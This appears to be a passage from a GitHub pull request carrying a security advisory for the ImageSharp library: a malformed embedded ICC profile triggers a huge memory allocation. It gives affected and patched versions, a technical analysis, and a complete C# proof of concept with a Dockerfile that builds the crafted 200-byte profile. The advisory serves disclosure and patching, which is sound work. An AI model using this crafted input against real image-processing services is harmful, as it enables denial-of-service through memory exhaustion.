</Reference>\n  </ItemGroup>\n</Project>\n\n```\n\nDockerfile:\n\n```dockerfile\nFROM mcr.microsoft.com/dotnet/sdk:8.0\nWORKDIR /work\nCOPY gwg2.csproj Program.cs ./\n# Restore only to obtain the published package. The repro project then uses a\n# direct DLL reference so ImageSharp's package build target is not invoked.\nRUN printf '%s\\n' '<Project Sdk=\"Microsoft.NET.Sdk\"><PropertyGroup><TargetFramework>net8.0</TargetFramework></PropertyGroup><ItemGroup><PackageReference Include=\"SixLabors.ImageSharp\" Version=\"4.1.1\" /></ItemGroup></Project>' > fetch.csproj \\\n    && dotnet restore fetch.csproj --nologo \\\n    && rm fetch.csproj \\\n    && dotnet build gwg2.csproj -c Release --nologo -v quiet\nENTRYPOINT [\"dotnet\", \"/work/bin/Release/net8.0/gwg2.dll\"]\n\n```\n\nRun:\n\n```sh\ndocker build -t imagesharp-gwg2-poc .\ndocker run --rm imagesharp-gwg2-poc exploit\ndocker run --rm imagesharp-gwg2-poc control\n```",
+  "details": "### Patched versions\n\nFixed in ImageSharp **3.2.0** and **4.1.2**. Users on v3 should upgrade to 3.2.0; users on v4 should upgrade to 4.1.2 or later.\n\n### Summary\n\nA malformed embedded ICC profile can make ImageSharp allocate memory from attacker-controlled CLUT channel and grid dimensions before verifying that the declared CLUT values are present.\n\nIn affected published v1, v2, and v3 packages before 3.2.0, the public lazy ICC parser allocates approximately 115 MB from the 200-byte test profile before rejecting the truncated tag. In affected published v4 packages from 4.0.0 through 4.1.1, decoding with ICC conversion enabled requests an 860,934,420-byte managed float array from the same profile.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected ranges: `>= 1.0.0-beta0001, < 3.2.0` and `>= 4.0.0, < 4.1.2`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nThe parser defect affects versions from `1.0.0-beta0001` up to, but not including, `3.2.0`, and v4 versions from `4.0.0` up to, but not including, `4.1.2`. The automatic `Image.Load` conversion path used by the main PoC exists in `>= 4.0.0, <= 4.1.1`; earlier versions expose the same parser defect through the public `IccProfile.Entries` accessor.\n### Details\n\nThe reproduced profile has an `A2B0` multi-process-elements (`mpet`) tag with a\n`clut` element declaring 15 input channels, 15 output channels, and three grid\npoints per input channel. [`ReadClutF32`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Metadata/Profiles/ICC/DataReader/IccDataReader.Lut.cs#L139-L162)\ncomputes `3^15 * 15` and allocates that many floats before reading any CLUT\nvalues or verifying that the tag has enough remaining data. The supplied\n200-byte profile ends immediately after the CLUT grid descriptor.\n\nIn v4, the path is reached when an application decodes an embedded ICC profile using\n`DecoderOptions.ColorProfileHandling = ColorProfileHandling.Convert`. The\ndefault setting, `Preserve`, does not parse the profile for conversion.\n\nIn affected v1, v2, and v3 versions before 3.2.0, `ReadClutF32` uses a jagged representation. Loading an ICC-bearing JPEG and then accessing `decoded.Metadata.IccProfile.Entries` reaches the public lazy parser. The malformed profile allocates the `3^15`-entry outer array before the missing CLUT values are detected.\n\n### Reproduction environment and result\n\nThe supplied automatic-conversion exploit and control were run against the published NuGet 4.1.1\n`net8.0` DLL in Docker on Debian 12 / Linux arm64 with .NET SDK 8.0.424 and\n.NET runtime 8.0.30. The same conversion fixture was run against published 4.0.0 and 4.1.0 with the same result.\n\nPublished 1.0.0, 2.0.0, 2.1.13, 3.0.0, and 3.1.12 were tested through public JPEG decode followed by `IccProfile.Entries`; each allocated approximately 114.9 MB, skipped the malformed tag, and exited normally. The published `1.0.0-beta0001` public `IccProfile(bytes).Entries` path allocated 114,813,528 bytes before a catchable managed bounds exception.\n\nOne exploit decode increased `GC.GetTotalAllocatedBytes(true)` by approximately\n861.5 million bytes, then returned\n`InvalidIccProfileException: Invalid conversion method`.\nThe reader catches the truncated-tag error and drops that tag. The identical\ninput with `ColorProfileHandling.Preserve` completed successfully with roughly\n0.5 million allocated bytes in the harness.\n\nOne complete exploit run produced:\n\n```text\nmode=exploit profile_bytes=200 requested_float_array=215233605 requested_bytes=860934420\nimagesharp_assembly=/work/bin/Release/net8.0/SixLabors.ImageSharp.dll\nimagesharp_version=4.1.1+0815358f9202a78bc7f3b83e19282dc3654b500f\nobserved_exception=SixLabors.ImageSharp.Metadata.Profiles.Icc.InvalidIccProfileException: Invalid conversion method.\nmanaged_bytes_allocated=861476416\nDocker exit status: 0\n```\n\nThe control from the same image produced:\n\n```text\nmode=control profile_bytes=200 requested_float_array=215233605 requested_bytes=860934420\nimagesharp_assembly=/work/bin/Release/net8.0/SixLabors.ImageSharp.dll\nimagesharp_version=4.1.1+0815358f9202a78bc7f3b83e19282dc3654b500f\ndecoded=1x1 icc_present=True\nmanaged_bytes_allocated=511888\nDocker exit status: 0\n```\n\nThe exact allocation counter includes runtime allocations and varies slightly\nbetween processes; the requested CLUT array itself is 860,934,420 bytes.\n\nNo active exploitation is known.\n\n### Impact\n\nThis report demonstrates a large attacker-controlled transient allocation in\nthe ICC conversion path. It does not demonstrate unhandled process termination:\nallocation failure is caught while parsing the malformed tag, so the impact\nshould be limited to memory pressure / input-validation failure unless a\nreproduction demonstrates a stronger result.\n\n\n### Complete PoC files\n\nProgram.cs:\n\n```csharp\nusing System;\nusing System.Buffers.Binary;\nusing System.IO;\nusing System.Reflection;\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.Formats;\nusing SixLabors.ImageSharp.Formats.Png;\nusing SixLabors.ImageSharp.Metadata.Profiles.Icc;\nusing SixLabors.ImageSharp.PixelFormats;\n\nstatic class Program\n{\n    private const int RequestedFloats = 215233605; // 3^15 * 15\n    private const int RequestedBytes = RequestedFloats * sizeof(float);\n\n    private static void U32(byte[] bytes, int offset, uint value) => BinaryPrimitives.WriteUInt32BigEndian(bytes.AsSpan(offset, 4), value);\n    private static void U16(byte[] bytes, int offset, ushort value) => BinaryPrimitives.WriteUInt16BigEndian(bytes.AsSpan(offset, 2), value);\n    private static void Ascii(byte[] bytes, int offset, string value) { for (int i = 0; i < value.Length; i++) bytes[offset + i] = (byte)value[i]; }\n\n    // ICC v4 RGB profile containing an A2B0 mpet tag whose CLUT is deliberately\n    // truncated after its grid descriptor. ReadClutF32 still sizes float[] from\n    // the 15 untrusted input/output channels and the grid value of three.\n    private static byte[] BuildTruncatedProfile()\n    {\n        const int tagOffset = 144;\n        const int elementOffset = 168;\n        byte[] profile = new byte[200];\n        U32(profile, 0, (uint)profile.Length);\n        Ascii(profile, 4, \"test\");\n        U32(profile, 8, 0x04000000);\n        U32(profile, 12, 0x6D6E7472); // display device\n        U32(profile, 16, 0x52474220); // RGB\n        U32(profile, 20, 0x58595A20); // XYZ\n        Ascii(profile, 36, \"acsp\");\n        U32(profile, 128, 1);\n        U32(profile, 132, 0x41324230); // A2B0\n        U32(profile, 136, tagOffset);\n        U32(profile, 140, 56);\n        U32(profile, tagOffset, 0x6D706574); // mpet\n        U16(profile, tagOffset + 8, 0);\n        U16(profile, tagOffset + 10, 0);\n        U32(profile, tagOffset + 12, 1);\n        U32(profile, tagOffset + 16, 24); // element offset relative to tag start\n        U32(profile, tagOffset + 20, 32);\n        U32(profile, elementOffset, 0x636C7574); // clut\n        U16(profile, elementOffset + 4, 15);\n        U16(profile, elementOffset + 6, 15);\n        for (int i = 0; i < 15; i++) profile[elementOffset + 8 + i] = 3;\n        return profile;\n    }\n\n    private static byte[] BuildPng(byte[] icc)\n    {\n        using var image = new Image<Rgba32>(1, 1);\n        image.Metadata.IccProfile = new IccProfile(icc);\n        using var output = new MemoryStream();\n        image.Save(output, new PngEncoder());\n        return output.ToArray();\n    }\n\n    public static int Main(string[] args)\n    {\n        string mode = args.Length == 1 ? args[0] : \"exploit\";\n        if (mode is not (\"exploit\" or \"control\")) throw new ArgumentException(\"mode must be exploit or control\");\n        Console.WriteLine($\"mode={mode} profile_bytes=200 requested_float_array={RequestedFloats} requested_bytes={RequestedBytes}\");\n        Console.WriteLine($\"imagesharp_assembly={typeof(Image).Assembly.Location}\");\n        Console.WriteLine($\"imagesharp_version={typeof(Image).Assembly.GetCustomAttribute<AssemblyInformationalVersionAttribute>()?.InformationalVersion}\");\n        long before = GC.GetTotalAllocatedBytes(true);\n        try\n        {\n            byte[] png = BuildPng(BuildTruncatedProfile());\n            var options = new DecoderOptions\n            {\n                ColorProfileHandling = mode == \"exploit\" ? ColorProfileHandling.Convert : ColorProfileHandling.Preserve\n            };\n            using Image decoded = Image.Load(options, png);\n            Console.WriteLine($\"decoded={decoded.Width}x{decoded.Height} icc_present={decoded.Metadata.IccProfile is not null}\");\n        }\n        catch (Exception exception)\n        {\n            Console.WriteLine($\"observed_exception={exception.GetType().FullName}: {exception.Message}\");\n        }\n        Console.WriteLine($\"managed_bytes_allocated={GC.GetTotalAllocatedBytes(true) - before}\");\n        return 0;\n    }\n}\n\n```\n\nProject file:\n\n```xml\n<Project Sdk=\"Microsoft.NET.Sdk\">\n  <PropertyGroup>\n    <OutputType>Exe</OutputType>\n    <TargetFramework>net8.0</TargetFramework>\n    <ImplicitUsings>disable</ImplicitUsings>\n    <Nullable>enable</Nullable>\n  </PropertyGroup>\n  <ItemGroup>\n    <Reference Include=\"SixLabors.ImageSharp\">\n      <HintPath>/root/.nuget/packages/sixlabors.imagesharp/4.1.1/lib/net8.0/SixLabors.ImageSharp.dll</HintPath>\n      <Private>true</Private>\n    </Reference>\n    <Reference Include=\"System.IO.Hashing\">\n      <HintPath>/root/.nuget/packages/system.io.hashing/8.0.0/lib/net8.0/System.IO.Hashing.dll</HintPath>\n      <Private>true</Private>\n    </Reference>\n  </ItemGroup>\n</Project>\n\n```\n\nDockerfile:\n\n```dockerfile\nFROM mcr.microsoft.com/dotnet/sdk:8.0\nWORKDIR /work\nCOPY gwg2.csproj Program.cs ./\n# Restore only to obtain the published package. The repro project then uses a\n# direct DLL reference so ImageSharp's package build target is not invoked.\nRUN printf '%s\\n' '<Project Sdk=\"Microsoft.NET.Sdk\"><PropertyGroup><TargetFramework>net8.0</TargetFramework></PropertyGroup><ItemGroup><PackageReference Include=\"SixLabors.ImageSharp\" Version=\"4.1.1\" /></ItemGroup></Project>' > fetch.csproj \\\n    && dotnet restore fetch.csproj --nologo \\\n    && rm fetch.csproj \\\n    && dotnet build gwg2.csproj -c Release --nologo -v quiet\nENTRYPOINT [\"dotnet\", \"/work/bin/Release/net8.0/gwg2.dll\"]\n\n```\n\nRun:\n\n```sh\ndocker build -t imagesharp-gwg2-poc .\ndocker run --rm imagesharp-gwg2-poc exploit\ndocker run --rm imagesharp-gwg2-poc control\n```",

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants